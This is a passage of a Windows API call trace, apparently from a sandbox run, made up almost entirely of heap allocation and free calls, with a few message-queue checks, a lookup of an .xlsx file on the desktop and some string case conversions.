(HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0124.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0124.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0124.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0124.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0124.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0124.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0124.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0124.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a75c0 [0124.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0124.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0124.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0124.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0124.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0124.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9950 [0124.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0124.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0124.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0124.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0124.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0124.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0124.106] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0124.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0124.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0124.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0124.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0124.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0124.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0124.106] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0124.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0124.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0124.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0124.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0124.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0124.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0124.106] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\mA8Gl8nzr8.xlsx", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25e346f0, ftCreationTime.dwHighDateTime=0x1d5e805, ftLastAccessTime.dwLowDateTime=0xc6f1e70, ftLastAccessTime.dwHighDateTime=0x1d5e269, ftLastWriteTime.dwLowDateTime=0xc6f1e70, ftLastWriteTime.dwHighDateTime=0x1d5e269, nFileSizeHigh=0x0, nFileSizeLow=0x17df9, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="mA8Gl8nzr8.xlsx", cAlternateFileName="MA8GL8~1.XLS")) returned 0x41ac500 [0124.106] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0124.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0124.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0124.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0124.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0124.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0124.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0124.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0124.107] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0124.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0124.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0124.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0124.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0124.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0124.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0124.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0124.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0124.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0124.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9bf0 [0124.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0124.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0124.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0124.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0124.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0124.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0124.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0124.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0124.107] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0124.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0124.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0124.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0124.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0124.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0124.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0124.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0124.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0124.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0124.107] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0124.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0124.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0124.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0124.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21d0 [0124.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0124.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0124.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0124.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0124.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0124.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21e0 [0124.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0124.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0124.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0124.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2200 [0124.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0124.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0124.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0124.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c80 [0124.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0124.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0124.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0124.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0124.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0124.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0124.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0124.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0124.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0124.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0124.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0124.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0124.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0124.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0124.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0124.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0124.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0124.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0124.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0124.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0124.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0124.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0124.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0124.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0124.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0124.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0124.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0124.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0124.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0124.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923e8 [0124.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0124.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0124.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0124.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0124.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0124.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0124.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0124.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0124.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0124.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0124.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0124.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0124.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0124.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0124.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0124.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0124.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0124.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0124.110] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0124.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0124.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0124.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0124.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0124.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0124.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0124.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0124.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0124.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0124.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0124.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0124.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0124.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0124.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0124.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0124.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0124.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0124.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0124.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0124.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0124.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0124.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0124.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0124.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0124.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0124.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0124.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0124.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0124.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0124.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0124.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0124.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0124.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0124.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0124.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0124.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0124.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0124.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0124.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0124.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0124.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0124.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0124.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0124.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0124.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0124.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0124.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0124.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0124.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0124.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0124.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0124.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0124.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0124.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0124.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0124.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0124.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0124.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0124.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0124.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0124.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0124.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0124.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0124.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0124.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0124.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0124.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0124.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0124.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0124.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0124.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0124.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0124.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0124.112] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0124.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0124.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0124.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0124.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0124.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0124.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0124.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0124.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0124.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0124.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0124.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0124.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0124.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0124.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0124.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0124.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0124.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0124.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0124.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0124.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0124.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0124.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0124.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0124.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0124.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0124.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0124.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0124.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 